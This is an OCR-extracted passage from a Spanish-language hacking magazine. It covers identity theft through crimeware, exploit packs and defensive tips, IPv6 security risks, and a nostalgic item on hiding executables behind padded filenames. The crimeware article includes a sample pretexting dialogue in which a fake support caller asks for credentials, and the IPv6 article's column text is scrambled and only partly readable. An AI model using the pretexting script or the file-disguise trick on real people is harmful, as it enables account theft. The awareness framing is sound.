vertir y generar un 99.09 % de ganancias, y con un mínimo de esfuerzo.Así es el por
que el crimeware ha crecido demasiado en los últimos años.
Ingeniería social
Hay varias maneras de adquirir estos tipos de infecciones en la red, una de ellas es la ingeniería social.
Por lo regular el atacante maneja la ingeniería social a su favor invitando a los “objetivos” a entrar a
ver un anuncio, ya sean videos, fotos, etc.
Ya que las personas tenemos un defecto muy grande el cual se le llama curiosidad. Y por el simple
morbo de ver que sucede o que contiene ese correo aceptamos sin ni siquiera saber quien es el que
envía el correo o si esta verificado y así podemos ser una victima, otra de ellas es mediante el traspaso
de archivos de personas extrañas que se hacen pasar por amigos para solamente robarte tu información
como estas hay muchísimas otras que por curiosidad acepten el contenido y queden vulnerables a perder
su información confidencial .
Ingeniería social
En el caso de las empresas el falló estaría en los empleados, que a veces por falta de capacitación
cometen estos errores.
Un caso seria la dependencia de soporte técnico o de ayuda del personal de servicios informáti-
cos y podría pasar esto:
Chico malo: Que tal Amy buenas tardes soy de soporte técnico, oye mira me informaron
que tu equipo esta demasiado lento y quiero corroborar a que se debe.
Chico malo: Ok, mira tienes un icono de asistencia remota en tu escritorio, ábrelo y
me podrías proporcionar tu usuario y contraseña para entrar a tu equipo así revisarlo
de manera remota?
www.hackingmexico.mx 31
robo de identidad mediante crimeware
Ataque silencioso
Crimeware no viene solo, por lo regular tiene también ayuda de otras vulnera-
bilidades, estas vulnerabilidades se encargan de ayudar al software malicioso a
infectar a los equipos vulnerables.
¿Porqué le doy el nombre de ataque silencioso?
Ya hace tiempo existen scripts llamados exploit packs que se encargan de ex-
plotar varias vulnerabilidades en sistemas por lo regular estos se aprovechan de
la ejecución remota en navegadores u otros complementos como lo son Word,
Excel, power point, java, reproductores de video y música. Este error
hace que el usuario al aceptar, entrar o abrir un sitio quede automáticamente in-
fectado y sea una victima mas de este software. Con la ayuda de los exploit packs
el software se encontrara incrustado en el código fuente del sitio como un frame
abriendo otro sitio o como un applet o ventana emergente tratando de hacer que
lo veamos casi obligatoriamente
32 www.hackingmexico.mx
robo de identidad mediante crimeware
¿Porqué lo estaría apoyando?
Los lugares mas comunes de infección son escuelas, parques, cibercafés o simple-
mente lugares públicos del cual mas de uno tenga acceso.
Recolección de información
La recolección de información por parte del atacante la hace mediante bases de
datos o enviándola via correo electrónico.
Unos ejemplos de ello son Botnets, almacenamiento mediante base de datos
via web. Tu identidad fue robada cuando has sido victima de robo de identidad
ya hay poco que puedas hacer, ya que tu nombre, domicilio entre otras cosas
han sido comprometidos; también “a veces” se tuvieron perdidas económicas
en compras que no fueron autorizadas por la persona propietaria “real” de las
cuentas o simplemente extrajeron el dinero sin autorización consiente del usuario.
Protección
Los métodos para protegernos son muchos , y también muchos softwares que
nos ayudan a esto.
Lo que tendríamos mas en cuenta es controlar un poco mas la curiosidad,
antes de abrir un correo ver si la persona en verdad es quien dice ser, si no te-
nemos ese nombre en nuestras listas no abrirlo, evitar abrir archivos adjuntos,
no seguir links que nos lleven a otros sitios fuera del correo, no abrir los correos
de bandeja spam, si es que no los conocemos, y si los conocemos verificar que
sea el que lo envía, mantener nuestro antivirus actualizado y verificar una ves
a la semana que nuestro sistema este libre de amenazas, tener un scanner de
malware y que nos avise de sitios potencialmente peligrosos, verificar que no
tengamos procesos raros ejecutándose en nuestro sistema.
Ya si tienes mas paranoia , verificar todas las conexiones que hacemos y a donde
las hacemos, ver nuestro archivo host en caso que estemos usando Windows, y
…. Naa creo que esas son todas. ¿FIN?
www.hackingmexico.mx 33
riesgos de seguridad en IPV6
340.2
82.36
6.920
riesgosde .938.
seguridad 463.4
en
63.37
IPv6
4.607
.431.7
Msc. Helios Mier
hmier@ieee.org
68.21
1.456
34 www.hackingmexico.mx
riesgos de seguridad en IPV6
ANTE tocolo IP el cuál estubo preparado para
finales de los noventas, teniendo casi
dera imperativa para todos, sin embargo
muchos implementadores de tecnología y
www.hackingmexico.mx 35
riesgos de seguridad en IPV6
protocolos
por protocolos conocidos, se podrían evi-
tar los mecanismos de protección simple- Aún cuando físicamente se tenga una red
mente con buscar el acceso a traves de local y se manejen servicios locales, se
una dirección IPv6. debe de tener siempre presente que con
IPv6 funciona de una manera distinta a
una dirección IPv6 se encuentra uno de
IPv4, de forma que deben de tratarse como
Si bien no será lo indicado suprimir el frente al internet público, y por lo tanto al
dos elementos aparte aunque se encuentren
protocolo IPv6 de un sistema, los ad- alcance de cualquier agente externo.
presentes en un mismo sistema, lo cual se
ministradores tienen que aprender a
espera que sea la situación predominante
considerar duplicar los mecanismos de Si bien a cada usuario se le delegará
durante el periodo de transición hasta que
protección para que se apliquen con la un segmento IPv6 con considerable
la necesidad de contar aún con servicios a
misma efectividad a todo lo que venga cantidad de direcciones para disponer
través de IPv4 sea abandonada.
sobre IPv6. de ellas, dependiendo de la forma en
36 www.hackingmexico.mx
riesgos de seguridad en IPV6
que la autonfiguración y parámetros Esto puede permitir se establezcan for- en gran medida riesgos severos como el
de DHCP que tenga predeterminados mas de comunicación desde dentro de o caso de IPsec.
de fábrica su equipo de red, se pueden hacia sitios restringidos externos a la red Sin embargo, hay que recalcar que IPv6
tomar algunas deducciones para encon- encapsulando protocolos entre paquetes en sí no es un protocolo orientado a la se-
trar otros equipos de red en un segmen- IPv6 o usando tuneles de salida remotos guridad, de manera que su implementa-
to perteneciente a un usuario. aprovechando la omisión de controlar lo ción de ninguna manera elimina riesgos
que entra y sale usando protocolo IPv6 por lo que hay que entender y aplicar
o algún protocolo de tuneleo como 6en4, todas las nuevas características que in-
Tuneleo y 6a4, teredo, etc. corpora para ayudar a mejorar el nivel de
canales seguridad de una red.
www.hackingmexico.mx 37
riesgos de seguridad en IPV6
sados exclusivamente en lo que se puede para dispositivos de red o sistemas que funcionalidad técnica y políticas admi-
lograr con IPv4. levantan registros de las direcciones IP’s nistrativas crean un escenario donde cada
En pocas palabras, el diseño de la arquitec- ya que al existir tantas, si por coinciden- dirección IP pudiera llegar a quedar atada
tura de seguridad de un sistema tiene que cia o maliciosamente se ingresan en una a una persona en particular:
contemplar que eventualmente funcionará red paquetes IP que lleven al limite las
también sobre redes y servidores con so- bitácoras y memorias internas de los dis- Las funcionalidades comunes de DHCP
porte IPv6 y las pruebas de calidad y segu- positivos que no serían capaces de alma- que logran en muchos casos asignar
cenar tanta cantidad de registros. siempre una misma dirección al mismo
dispositivo.
Saturación De hecho este tipo de vulnerabilidad ha
de recursos sido de las primeras que han sido docu-
mentadas y se comienza a descubrir se
Uno de los modos de autoconfiguración por
default en muchos routers donde se toma la
encuentra presente en muchos productos dirección MAC del dispositivo para con-
ridad del sistema deben de incluir casos de
comerciales y sistemas de redes con IPv6 formar la dirección IPv6 que se le asignará.
prueba contemplando el mismo escenario.
listo. [] http://www.networkworld.com/ Si se omite habilitar el modo de privacidad
Debido a que el protocolo IPv6 contem-
para la autoconfiguración y ofuscación de
pla 128 bits para designar el direcciona-
miento, se espera que a cada usuario y red Geolocalización la dirección IP usada por el dispositivo.
local se le delegen una enorme cantidad
de direcciones IP para su uso a discreción
y personalización Las políticas de cada NIC regional don-
del administrador del segmento. de direcciones de se asignan bloques de direcciones IP
en base a una localización geográfica por
país, carrier, ISP, estado, región o ciudad.
Estas increibles cantidades de direccio- news/2011/050311-microsoft-juniper-
Es esperado en algún momento que cada
nes que se ponen sobre la mesa a partir ipv6.html
usuario y dispositivo llegue a tener una
de este momento, puede llegar a generar Si bien la cantidad de direcciones IP dis-
dirección IPv6 fija de forma permanente,
una situación de negación de servicio ponible es inmensa, una combinación de
de manera que tiene que considerarse las
38 www.hackingmexico.mx
riesgos de seguridad en IPV6
Tecnología cubrimiento de vulnerabilidades en el Siendo una tecnología relativamente nue-
naciente y
diseño del nuevo protocolo así como de va, se debe de tener preparación adecuada
las implementaciones de este en todos los para su aplicación práctica y resolución de
productos comerciales que se usen. incidentes, siendo para muchos un área de
vulnerabilidades Una parte considerable de riesgos de expertise que tienen que desarrollar con
por descubrir urgencia debido a que antes de que se den
cuenta ya estarán viendose en la necesidad
Con de implementar servicios públicos de red
clu
implicaciones en cuanto a privacidad y
por medio de este protocolo.
registrabilidad.
www.hackingmexico.mx 39
old school
Old A School
qui recordaremos
con nostalgia los
viejos tiempos,
las técnicas
usadas, y eventos
importantes que ocurrieron en el
mundo del hack.
En esta ocasión hablaremos de
Cyruxnet, un portal informatico
que existio en los años 90’s
donde se publicaron por primera
vez técnicas exclusivas, tales
como ocultamiento de .exe’s en
mensajes de Outlook express, lo
cual consistía en agregar el valor
Cyruxnet, ASCII del espacio en blanco al
un portal nombre del archivo después de la
informatico que extensión para hacerlo pasar por
existio en los un archivo inofensivo.
años 90’s donde Algo asi de sencillo, lograba
se publicaron que cuando vieras el archivo
por primera adjunto en tu correo, pensaras que
vez técnicas se trataba de una foto, pero en
exclusivas, realidad era un ejecutable.
tales como También fue de los primeros
ocultamiento de sitios en publicar códigos de
.exe’s esteganografía para ocultar código
malicioso dentro de fotos u otros
archivos. Un gran recurso de bugs
y exploits de la época, cuando la
información de este tipo era un
poco mas difícil de conseguir.
40 www.hackingmexico.mx
seccion o articulo
www.hackingmexico.mx 41
seccion o articulo
42 www.hackingmexico.mx
I N T E G R AT E C O N N O S O T R O S
UNETE A NUESTRO EQUIPO DE COLABORADORES
informes 55 10 68 88 09
info@hackingmexico.mx
#01